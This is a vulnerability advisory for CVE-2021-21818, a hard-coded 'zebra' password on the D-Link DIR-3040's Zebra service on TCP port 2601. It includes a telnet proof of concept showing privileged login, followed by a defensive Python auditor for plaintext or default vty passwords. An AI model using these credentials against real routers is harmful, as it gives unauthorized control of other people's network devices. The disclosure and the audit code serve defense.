D-LINK DIR-3040 service component uses default password (CVE-2021-21818)

Description

The DIR-3040 is an AC3000-based wireless internet router. Zebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols. The DIR-3040 runs this service by default on TCP port 2601 and can be accessed by anyone on the network. This service also uses a configuration file containing a hard-coded password zebra:

```
admin@dlinkrouter:~# cat /tmp/zebra.conf
hostname Router
password zebra
enable password zebra
```

Exploit Proof of Concept

```
$ telnet 192.168.100.1 2601
Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'.

Hello, this is Quagga (version 1.1.1).
Copyright 1996-2005 Kunihiro Ishiguro, et al.

User Access Verification

Password:
Router>
  echo      Echo a message back to the vty
  enable    Turn on privileged mode command
  exit      Exit current mode and down to previous mode
  help      Description of the interactive help system
  list      Print command list
  quit      Exit current mode and down to previous mode
  show      Show running system information
  terminal  Set terminal line parameters
  who       Display who is on vty
Router> enable
Password:
Router#
  clear      Clear stored data
  configure  Configuration from vty interface
  copy       Copy configuration
  debug      Debugging functions (see also 'undebug')
  disable    Turn off privileged mode command
  echo       Echo a message back to the vty
  enable     Turn on privileged mode command
  end        End current mode and change to enable mode.
  exit       Exit current mode and down to previous mode
  help       Description of the interactive help system
  list       Print command list
  logmsg     Send a message to enabled logging destinations
  no         Negate a command or set its defaults
  quit       Exit current mode and down to previous mode
  show       Show running system information
  terminal   Set terminal line parameters
  who        Display who is on vty
  write      Write running configuration to memory, network, or terminal
```
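For auditing firmware images or running devices for this weakness, the following added example (not code from the advisory, D-Link or Quagga) checks a Quagga-style configuration such as the zebra.conf above for plaintext or default vty passwords and for a missing `access-class` on the vty line. The function name, the hardened sample, its placeholder hash and the ACL name are assumptions made for illustration.

```python
import re

KNOWN_DEFAULTS = {"zebra"}  # value from the advisory; extend with your own list

# Config exactly as shown in the advisory.
PAGE_CONF = "hostname Router\npassword zebra\nenable password zebra\n"
# Constructed hardened sample; hash and ACL name are placeholders.
HARDENED_CONF = (
    "hostname Router\n"
    "password 8 HASH_PLACEHOLDER\n"
    "enable password 8 HASH_PLACEHOLDER\n"
    "service password-encryption\n"
    "access-list vty-mgmt permit 127.0.0.0/8\n"
    "line vty\n"
    " access-class vty-mgmt\n"
)

def audit_quagga_conf(text, defaults=KNOWN_DEFAULTS):
    """Return sorted findings for vty password and access settings."""
    findings, in_vty, has_vty_acl = set(), False, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("!"):
            continue
        if line == "line vty":
            in_vty = True
            continue
        if in_vty and raw[0] in " \t":  # indented body of the vty block
            has_vty_acl = has_vty_acl or line.startswith("access-class ")
            continue
        in_vty = False
        m = re.match(r"(enable password|password)\s+(?:(8)\s+)?(\S+)$", line)
        if not m:
            continue
        kind, hashed, secret = m.groups()
        if hashed:  # "password 8 <hash>" is the encrypted storage form
            continue
        findings.add(f"{kind}: stored in plaintext")
        if secret.lower() in defaults:
            findings.add(f"{kind}: well-known default value")
    if not has_vty_acl:
        findings.add("line vty: no access-class restricting connections")
    return sorted(findings)

if __name__ == "__main__":
    for name, conf in (("page", PAGE_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_quagga_conf(conf) or "no findings")
```

A clean result only covers the configuration file; whether TCP port 2601 is reachable from the LAN still has to be checked on the device itself.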

